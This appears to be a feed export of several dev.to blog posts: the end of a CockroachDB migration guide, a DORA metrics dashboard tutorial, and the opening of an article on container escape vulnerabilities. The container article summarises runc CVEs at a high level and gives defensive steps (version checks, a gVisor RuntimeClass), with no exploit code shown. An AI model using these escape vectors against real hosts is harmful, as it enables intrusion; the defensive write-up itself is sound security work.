    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;after&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;24h → 20%&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;after&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;24h → 50%&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;after&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;24h → 80%&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;after&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;24h → 100%&lt;/span&gt;
  &lt;span class="na"&gt;rollback_trigger&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;error_rate_threshold&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;0.1%&lt;/span&gt;
    &lt;span class="na"&gt;latency_p99_threshold&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;500ms&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;At each stage, monitor:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Error rates (should be identical or better)&lt;/li&gt;
&lt;li&gt;Latency p50/p95/p99 (CockroachDB was 15% faster for our read patterns)&lt;/li&gt;
&lt;li&gt;Data consistency (shadow-read mismatches should stay at 0)&lt;/li&gt;
&lt;/ul&gt;
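
&lt;p&gt;One detail worth stressing: make the percentage routing sticky per user, not random per request, so a user doesn't bounce between databases mid-session. A deterministic hash bucket does it (a sketch; our real implementation sat behind the feature-flag service):&lt;/p&gt;

```python
import hashlib

def route_read(user_id, cockroach_percentage):
    """Deterministic percentage rollout: hash the user id into a
    bucket 0-99 so a given user consistently hits the same database
    throughout the shift."""
    digest = hashlib.sha256(str(user_id).encode()).hexdigest()
    bucket = int(digest, 16) % 100
    return "cockroach" if bucket < cockroach_percentage else "postgres"
```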

&lt;h2&gt;
  
  
  Phase 5: The 12-Second Cutover
&lt;/h2&gt;

&lt;p&gt;Once 100% of reads are going to CockroachDB successfully:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Stop dual-writes (Postgres stops receiving new data)&lt;/li&gt;
&lt;li&gt;Drain any remaining shadow-write failure queue&lt;/li&gt;
&lt;li&gt;Final consistency check (compare row counts, checksums on critical tables)&lt;/li&gt;
&lt;li&gt;Update connection strings to point to CockroachDB&lt;/li&gt;
&lt;li&gt;Restart application pools&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Steps 1-5 took 12 seconds in our case. The application experienced zero errors during cutover because reads were already going to CockroachDB.&lt;/p&gt;
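
&lt;p&gt;Step 3 can be sketched as a per-table count comparison; real checksums over ordered rows follow the same shape. The &lt;code&gt;execute&lt;/code&gt; interface matches the middleware used earlier, and table names are assumed trusted (not user input):&lt;/p&gt;

```python
async def final_consistency_check(primary, shadow, tables):
    """Compare per-table row counts between the two databases and
    return any mismatches as (table, primary_count, shadow_count)."""
    mismatches = []
    for table in tables:
        query = f"SELECT COUNT(*) FROM {table}"
        primary_count = await primary.execute(query, ())
        shadow_count = await shadow.execute(query, ())
        if primary_count != shadow_count:
            mismatches.append((table, primary_count, shadow_count))
    return mismatches
```

&lt;p&gt;An empty result is the green light for flipping connection strings; any mismatch aborts the cutover with no user impact, since reads are already served by CockroachDB.&lt;/p&gt;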

&lt;h2&gt;
  
  
  Post-Migration
&lt;/h2&gt;

&lt;p&gt;Keep Postgres running in read-only mode for 30 days as a safety net. If anything goes wrong, you can revert by switching connection strings back. After 30 days with no issues, decommission the Postgres instance.&lt;/p&gt;

&lt;h2&gt;
  
  
  Lessons Learned
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Shadow-read validation catches 95% of migration bugs.&lt;/strong&gt; Don't skip it.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The failure queue is critical.&lt;/strong&gt; Without it, your shadow database will have data gaps.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Run dual-write for at least 2 weeks.&lt;/strong&gt; One week isn't enough to catch all edge cases.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Monitor CockroachDB performance during the migration.&lt;/strong&gt; Backfilling 2TB while handling dual-writes is a significant load.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Test rollback before you need it.&lt;/strong&gt; We practiced the rollback procedure three times before the actual migration.&lt;/li&gt;
&lt;/ol&gt;




&lt;p&gt;Planning a database migration? We've done zero-downtime migrations for databases from 100GB to 5TB. &lt;a href="https://techsaas.cloud/contact" rel="noopener noreferrer"&gt;Book a consultation&lt;/a&gt; or explore our &lt;a href="https://techsaas.cloud/services" rel="noopener noreferrer"&gt;infrastructure services&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>tutorial</category>
      <category>programming</category>
      <category>devops</category>
    </item>
    <item>
      <title>DORA Metrics: A Platform Engineering Dashboard</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Wed, 06 May 2026 19:07:10 +0000</pubDate>
      <link>https://dev.to/yash_pritwani_07a77613fd6/dora-metrics-a-platform-engineering-dashboard-16ma</link>
      <guid>https://dev.to/yash_pritwani_07a77613fd6/dora-metrics-a-platform-engineering-dashboard-16ma</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/dora-metrics-platform-engineering-dashboard" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;







&lt;p&gt;title: "DORA Metrics for Platform Engineering: What Your Dashboard Should Actually Measure"&lt;br&gt;
slug: dora-metrics-platform-engineering-dashboard&lt;br&gt;
category: Platform Engineering&lt;br&gt;
tags: [DORA Metrics, Platform Engineering, Developer Productivity, DevOps, SRE]&lt;br&gt;
seo_title: "DORA Metrics Guide 2026: Platform Engineering Dashboard That Works"&lt;br&gt;
meta_description: "Why most DORA metrics dashboards are misleading and how to build one that actually drives improvement. Covers deployment frequency, lead time, MTTR, and change failure rate with Grafana examples."&lt;/p&gt;
&lt;h2&gt;
  
  
  estimated_read_time: 10
&lt;/h2&gt;
&lt;h1&gt;
  
  
  DORA Metrics for Platform Engineering: What Your Dashboard Should Actually Measure
&lt;/h1&gt;

&lt;p&gt;Every platform engineering team has a DORA metrics dashboard. Most of them are lying.&lt;/p&gt;

&lt;p&gt;Deployment frequency of 47/day looks great until you realize 40 of those are config changes to a feature flag service. Lead time of 2 hours looks fast until you realize it's measuring time from merge to deploy, not time from first commit to production.&lt;/p&gt;

&lt;p&gt;Here's how to build a DORA dashboard that actually tells you something useful.&lt;/p&gt;
&lt;h2&gt;
  
  
  The Four Metrics (And What They Actually Mean)
&lt;/h2&gt;
&lt;h3&gt;
  
  
  1. Deployment Frequency
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;What people measure:&lt;/strong&gt; &lt;code&gt;COUNT(deployments) / time&lt;/code&gt;&lt;br&gt;
&lt;strong&gt;What you should measure:&lt;/strong&gt; &lt;code&gt;COUNT(meaningful_deployments) / time&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;A meaningful deployment changes user-facing behavior. Config changes, dependency bumps, and CI fixes don't count.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Bad: counts everything
sum(increase(deployments_total[24h]))

# Better: filter by deployment type
sum(increase(deployments_total{type="feature"}[24h]))
+ sum(increase(deployments_total{type="bugfix"}[24h]))
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
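
&lt;p&gt;The same filtering logic in miniature, if you compute the metric from a deploy log instead of Prometheus (the log schema here is an assumption for illustration):&lt;/p&gt;

```python
def deployment_frequency(deploys, days):
    """Meaningful deployments per day. Each log entry is
    (timestamp, type); only user-facing types count."""
    meaningful = [d for d in deploys if d[1] in ("feature", "bugfix")]
    return len(meaningful) / days

log = [
    (1, "feature"), (2, "config"), (3, "config"),
    (4, "bugfix"), (5, "dependency"), (6, "feature"),
]
# Naive count: 6 deploys over 3 days looks like 2.0/day.
# Meaningful count: 3 deploys, i.e. 1.0/day.
```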



&lt;h3&gt;
  
  
  2. Lead Time for Changes
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;What people measure:&lt;/strong&gt; Merge to deploy&lt;br&gt;
&lt;strong&gt;What you should measure:&lt;/strong&gt; First commit to production traffic&lt;/p&gt;

&lt;p&gt;The time from a developer's first commit to when real users hit the new code. This captures code review wait time, CI queue time, staging validation, and rollout duration — all the friction your platform creates.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Capture the full pipeline
histogram_quantile(0.50,
  sum(rate(lead_time_seconds_bucket{
    stage="first_commit_to_production"
  }[7d])) by (le)
)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3. Change Failure Rate
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;What people measure:&lt;/strong&gt; &lt;code&gt;failed_deploys / total_deploys&lt;/code&gt;&lt;br&gt;
&lt;strong&gt;What you should measure:&lt;/strong&gt; &lt;code&gt;deploys_causing_degradation / total_deploys&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;A deployment that fails CI and never reaches production isn't a change failure — it's CI working correctly. A deployment that passes everything but causes a 10% error rate spike IS a change failure.&lt;/p&gt;
&lt;h3&gt;
  
  
  4. Mean Time to Recovery (MTTR)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;What people measure:&lt;/strong&gt; Time from alert to resolution&lt;br&gt;
&lt;strong&gt;What you should measure:&lt;/strong&gt; Time from user impact to user recovery&lt;/p&gt;

&lt;p&gt;If your alerting has 15 minutes of lag, your MTTR looks 15 minutes better than reality. Measure from the moment error rates spike, not from when PagerDuty fires.&lt;/p&gt;
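
&lt;p&gt;Measuring from impact means finding the impact window in the metric itself. A toy detector over an error-rate series shows the idea (assumed shape: pairs of epoch seconds and error rate; the 3x-baseline threshold is a heuristic, and production would use a recording rule rather than Python):&lt;/p&gt;

```python
def impact_window(samples, baseline, factor=3.0):
    """Locate (impact_start, recovery) in an error-rate series: impact
    begins when the rate first exceeds factor x baseline and ends when
    it first drops back under. Returns (None, None) if no spike."""
    threshold = factor * baseline
    start = end = None
    for t, rate in samples:
        if start is None and rate > threshold:
            start = t
        elif start is not None and end is None and rate <= threshold:
            end = t
    return start, end
```

&lt;p&gt;MTTR is then recovery minus impact start — not resolution time minus alert time.&lt;/p&gt;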
&lt;h2&gt;
  
  
  The Dashboard That Works
&lt;/h2&gt;
&lt;h3&gt;
  
  
  Panel 1: Weekly Deployment Velocity
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Line chart: deployments per week, split by type (feature, bugfix, infra)&lt;/li&gt;
&lt;li&gt;Exclude: config changes, dependency updates, CI fixes&lt;/li&gt;
&lt;li&gt;Annotation: mark release freezes, incidents, holidays&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;
  
  
  Panel 2: Lead Time Distribution
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Heatmap: lead time buckets (hours) over past 30 days&lt;/li&gt;
&lt;li&gt;Show p50, p75, p95 — not just average&lt;/li&gt;
&lt;li&gt;Split by team if multi-team org&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;
  
  
  Panel 3: Change Failure Rate Trend
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Stacked bar: successful deploys vs. failure-causing deploys per week&lt;/li&gt;
&lt;li&gt;Overlay: change failure rate as percentage line&lt;/li&gt;
&lt;li&gt;Alert threshold at 15% (DORA "high" performer benchmark)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;
  
  
  Panel 4: MTTR by Severity
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Bar chart: average MTTR split by incident severity (SEV1-4)&lt;/li&gt;
&lt;li&gt;Include: detection time, triage time, fix time, verification time&lt;/li&gt;
&lt;li&gt;Goal lines: SEV1 &amp;lt; 1hr, SEV2 &amp;lt; 4hr, SEV3 &amp;lt; 24hr&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;
  
  
  Panel 5: Platform Health Score
&lt;/h3&gt;

&lt;p&gt;Composite metric combining all four DORA metrics into a single score:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;score&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="nf"&gt;normalize&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;deployment_freq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;target&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;daily&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mf"&gt;0.25&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt;
  &lt;span class="nf"&gt;normalize&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;lead_time_hours&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;target&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;24&lt;/span&gt;&lt;span class="n"&gt;h&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mf"&gt;0.25&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt;
  &lt;span class="nf"&gt;normalize&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;change_failure_rate&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;target&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;0.85&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mf"&gt;0.25&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt;
  &lt;span class="nf"&gt;normalize&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;mttr_hours&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;target&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="n"&gt;h&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mf"&gt;0.25&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
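&lt;p&gt;A runnable version of that sketch, with a simple linear &lt;code&gt;normalize&lt;/code&gt; helper. The helper, the equal 0.25 weights, and the targets are illustrative assumptions, not part of the DORA specification:&lt;/p&gt;

```python
# Illustrative composite "platform health" score. The normalize()
# helper, the equal 0.25 weights, and the targets are assumptions --
# tune them to your own team's baselines.

def normalize(value: float, target: float) -> float:
    """Map a metric onto [0, 1]; reaching the target scores 1.0."""
    if target <= 0:
        raise ValueError("target must be positive")
    return min(value / target, 1.0)

def platform_health_score(deploys_per_day: float, lead_time_hours: float,
                          change_failure_rate: float, mttr_hours: float) -> float:
    return (
        normalize(deploys_per_day, target=1.0) * 0.25 +            # daily deploys
        normalize(1 / lead_time_hours, target=1 / 24) * 0.25 +     # <= 24h lead time
        normalize(1 - change_failure_rate, target=0.85) * 0.25 +   # <= 15% CFR
        normalize(1 / mttr_hours, target=1.0) * 0.25               # <= 1h MTTR
    )

# A team deploying daily, 24h lead time, 10% CFR, 1h MTTR hits all targets:
print(round(platform_health_score(1.0, 24, 0.10, 1.0), 2))  # 1.0
```

&lt;p&gt;Clamping each term at 1.0 keeps one exceptional metric from masking a weak one.&lt;/p&gt;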



&lt;h2&gt;
  
  
  Common Anti-Patterns
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. Gaming the Metrics
&lt;/h3&gt;

&lt;p&gt;Teams split PRs into tiny changes to inflate deployment frequency. Fix: measure feature completion rate alongside deployment frequency.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Measuring Teams Against Each Other
&lt;/h3&gt;

&lt;p&gt;DORA metrics are for teams to improve themselves, not for management to rank teams. Different services have legitimately different deployment profiles.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Ignoring Context
&lt;/h3&gt;

&lt;p&gt;A team with 0 deployments during a security incident investigation isn't underperforming — they're doing the right thing. Always annotate metric dashboards with context.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. Snapshot Obsession
&lt;/h3&gt;

&lt;p&gt;Looking at this week's numbers in isolation tells you nothing. The trend over 3-6 months is what matters.&lt;/p&gt;

&lt;h2&gt;
  
  
  Implementation: Data Sources for Real DORA
&lt;/h2&gt;

&lt;p&gt;The metrics above are only as good as the data feeding them. Here's where to get each metric:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Deployment Frequency:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Source: CI/CD pipeline events (GitHub Actions webhook, ArgoCD notifications, Flux alerts)&lt;/li&gt;
&lt;li&gt;Label each deployment with type: &lt;code&gt;feature&lt;/code&gt;, &lt;code&gt;bugfix&lt;/code&gt;, &lt;code&gt;config&lt;/code&gt;, &lt;code&gt;dependency&lt;/code&gt;, &lt;code&gt;infra&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Push to Prometheus via pushgateway or use a deployment tracker service&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Lead Time:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Source: Git events (first commit timestamp) + deployment events (production rollout timestamp)&lt;/li&gt;
&lt;li&gt;Calculate: &lt;code&gt;production_deploy_time - first_commit_time&lt;/code&gt; for each PR/branch&lt;/li&gt;
&lt;li&gt;Tools: LinearB, Sleuth, or custom webhook that tracks PR lifecycle&lt;/li&gt;
&lt;/ul&gt;
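&lt;p&gt;The subtraction itself is trivial, but the two timestamps usually arrive as ISO-8601 strings from different webhooks. A minimal sketch (field names and timestamps are illustrative):&lt;/p&gt;

```python
# Lead time for a single change: production deploy time minus the
# first commit time on the branch. Timestamps are ISO-8601 strings,
# as typically delivered by Git and CI/CD webhooks.
from datetime import datetime

def lead_time_hours(first_commit_iso: str, deploy_iso: str) -> float:
    first = datetime.fromisoformat(first_commit_iso)
    deploy = datetime.fromisoformat(deploy_iso)
    return (deploy - first).total_seconds() / 3600

print(lead_time_hours("2026-05-06T09:00:00+00:00",
                      "2026-05-07T15:30:00+00:00"))  # 30.5
```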

&lt;p&gt;&lt;strong&gt;Change Failure Rate:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Source: Incident tracking (PagerDuty, Opsgenie) correlated with deployment events&lt;/li&gt;
&lt;li&gt;Logic: if incident starts within 1 hour of deployment AND affects the deployed service, count as change failure&lt;/li&gt;
&lt;li&gt;This correlation is the hardest part — most teams get it wrong because they don't link incidents to deploys&lt;/li&gt;
&lt;/ul&gt;
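&lt;p&gt;The correlation logic above can be sketched in a few lines. The event shapes here are illustrative assumptions — adapt them to your actual PagerDuty/deployment payloads:&lt;/p&gt;

```python
# Count a deployment as a change failure if an incident starts within
# one hour of the deploy AND affects the same service. Event dict
# shapes are illustrative, not a real PagerDuty/ArgoCD schema.
from datetime import datetime, timedelta

WINDOW = timedelta(hours=1)

def change_failure_rate(deploys, incidents):
    """deploys/incidents: lists of dicts with 'service' and ISO 'time'."""
    def ts(event):
        return datetime.fromisoformat(event["time"])
    failures = 0
    for d in deploys:
        if any(i["service"] == d["service"]
               and timedelta(0) <= ts(i) - ts(d) <= WINDOW
               for i in incidents):
            failures += 1
    return failures / len(deploys) if deploys else 0.0

deploys = [
    {"service": "api", "time": "2026-05-06T10:00:00"},
    {"service": "api", "time": "2026-05-06T14:00:00"},
]
incidents = [{"service": "api", "time": "2026-05-06T10:20:00"}]
print(change_failure_rate(deploys, incidents))  # 0.5
```

&lt;p&gt;The one-hour window is a heuristic; slow-burn failures (memory leaks, data corruption) need manual linking in the incident tracker.&lt;/p&gt;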

&lt;p&gt;&lt;strong&gt;MTTR:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Source: Monitoring (Prometheus alertmanager) for impact start, incident tracker for resolution&lt;/li&gt;
&lt;li&gt;Measure from first error rate spike (detected by anomaly detection), not from alert firing&lt;/li&gt;
&lt;li&gt;Include: detection lag, triage time, fix time, verification time as separate sub-metrics&lt;/li&gt;
&lt;/ul&gt;
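&lt;p&gt;Splitting MTTR into those sub-metrics is straightforward once you have the event timestamps; a sketch with illustrative event names:&lt;/p&gt;

```python
# Break MTTR into sub-metrics from five event timestamps (names are
# illustrative): impact start (first error spike), alert fired,
# triage complete, fix deployed, recovery verified.
from datetime import datetime

def _hours(start_iso: str, end_iso: str) -> float:
    delta = datetime.fromisoformat(end_iso) - datetime.fromisoformat(start_iso)
    return delta.total_seconds() / 3600

def mttr_breakdown(impact, alerted, triaged, fixed, verified):
    return {
        "detection_h": _hours(impact, alerted),
        "triage_h": _hours(alerted, triaged),
        "fix_h": _hours(triaged, fixed),
        "verification_h": _hours(fixed, verified),
        "mttr_h": _hours(impact, verified),   # total, end to end
    }

breakdown = mttr_breakdown(
    "2026-05-06T10:00:00", "2026-05-06T10:12:00", "2026-05-06T10:30:00",
    "2026-05-06T11:15:00", "2026-05-06T11:30:00")
print(breakdown["mttr_h"])  # 1.5
```

&lt;p&gt;Tracking the phases separately tells you where to invest: a large &lt;code&gt;detection_h&lt;/code&gt; points at monitoring gaps, a large &lt;code&gt;fix_h&lt;/code&gt; at slow deploy pipelines.&lt;/p&gt;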

&lt;h2&gt;
  
  
  SPACE Framework: Beyond DORA
&lt;/h2&gt;

&lt;p&gt;DORA measures delivery performance. SPACE (from Microsoft Research) adds developer experience:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;S&lt;/strong&gt;atisfaction and well-being (quarterly survey, eNPS score)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;P&lt;/strong&gt;erformance (DORA metrics as described above)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;A&lt;/strong&gt;ctivity (commits, PRs, reviews — use carefully, never as productivity proxy)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;C&lt;/strong&gt;ommunication and collaboration (PR review turnaround, async response time)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;E&lt;/strong&gt;fficiency and flow (focus time from calendar analysis, context switches from tool telemetry)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The combination of DORA (system performance) + SPACE (human experience) gives you the full picture. A team with elite DORA metrics but 30% satisfaction is one resignation away from collapse.&lt;/p&gt;

&lt;h2&gt;
  
  
  Our Recommendation
&lt;/h2&gt;

&lt;p&gt;Start with just two metrics: deployment frequency (filtered by type) and change failure rate. These are the easiest to instrument and the most actionable. Add lead time once you have the data pipeline working. Add MTTR when you have incident tracking mature enough to correlate with deploys.&lt;/p&gt;

&lt;p&gt;The dashboard is not the goal. The goal is a team that ships faster with fewer failures. The dashboard just makes the trend visible so you can have evidence-based conversations about where to invest in your platform.&lt;/p&gt;




&lt;p&gt;Want help building a DORA metrics dashboard that actually drives improvement? &lt;a href="https://techsaas.cloud/contact" rel="noopener noreferrer"&gt;Book a free platform engineering consultation&lt;/a&gt; or explore our &lt;a href="https://techsaas.cloud/services" rel="noopener noreferrer"&gt;DevOps services&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>devops</category>
      <category>platformengineering</category>
      <category>metrics</category>
      <category>observability</category>
    </item>
    <item>
      <title>Container Escape Vulnerabilities in 2026: runc, cgroups, and Kernel Capabilities</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Wed, 06 May 2026 13:22:28 +0000</pubDate>
      <link>https://dev.to/yash_pritwani_07a77613fd6/container-escape-vulnerabilities-in-2026-runc-cgroups-and-kernel-capabilities-3coi</link>
      <guid>https://dev.to/yash_pritwani_07a77613fd6/container-escape-vulnerabilities-in-2026-runc-cgroups-and-kernel-capabilities-3coi</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/container-escape-vulnerabilities-runc-cgroups-2026" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;







&lt;h1&gt;
  
  
  Container Escape Vulnerabilities in 2026: What Still Works and How to Defend
&lt;/h1&gt;

&lt;p&gt;Containers are not VMs. The isolation boundary is thinner than most engineers realize — a shared kernel, a set of namespaces, and some cgroup limits. When any of these layers has a bug or misconfiguration, an attacker inside a container can reach the host.&lt;/p&gt;

&lt;p&gt;Here are three escape vectors that remain viable in 2026, and how to defend against each.&lt;/p&gt;
&lt;h2&gt;
  
  
  Vector 1: runc CVEs — The Runtime Layer
&lt;/h2&gt;

&lt;p&gt;runc is the OCI container runtime that Docker and Kubernetes use under the hood. When runc has a vulnerability, every container on the host is at risk.&lt;/p&gt;
&lt;h3&gt;
  
  
  CVE History That Matters
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;CVE-2024-21626&lt;/strong&gt; (Leaky File Descriptors): runc leaked file descriptors into containers, allowing an attacker to access the host filesystem through &lt;code&gt;/proc/self/fd/&lt;/code&gt;. Any container image could exploit this on first run.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CVE-2019-5736&lt;/strong&gt; (runc overwrite): A malicious container could overwrite the host runc binary, gaining code execution on the host when any container next starts.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;These aren't theoretical. CVE-2024-21626 was exploitable with a single &lt;code&gt;WORKDIR&lt;/code&gt; instruction in a Dockerfile.&lt;/p&gt;
&lt;h3&gt;
  
  
  Defense
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Check your runc version&lt;/span&gt;
runc &lt;span class="nt"&gt;--version&lt;/span&gt;
&lt;span class="c"&gt;# Must be &amp;gt;= 1.1.14 (patches CVE-2024-21626)&lt;/span&gt;

&lt;span class="c"&gt;# Use a hardened runtime instead&lt;/span&gt;
&lt;span class="c"&gt;# gVisor (application kernel — no shared kernel)&lt;/span&gt;
&lt;span class="c"&gt;# Kata Containers (lightweight VM — true isolation)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;For high-security workloads, replace runc entirely:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Kubernetes RuntimeClass for gVisor&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;node.k8s.io/v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;RuntimeClass&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gvisor&lt;/span&gt;
&lt;span class="na"&gt;handler&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;runsc&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;runtimeClassName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gvisor&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;untrusted-workload&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;myapp:latest&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
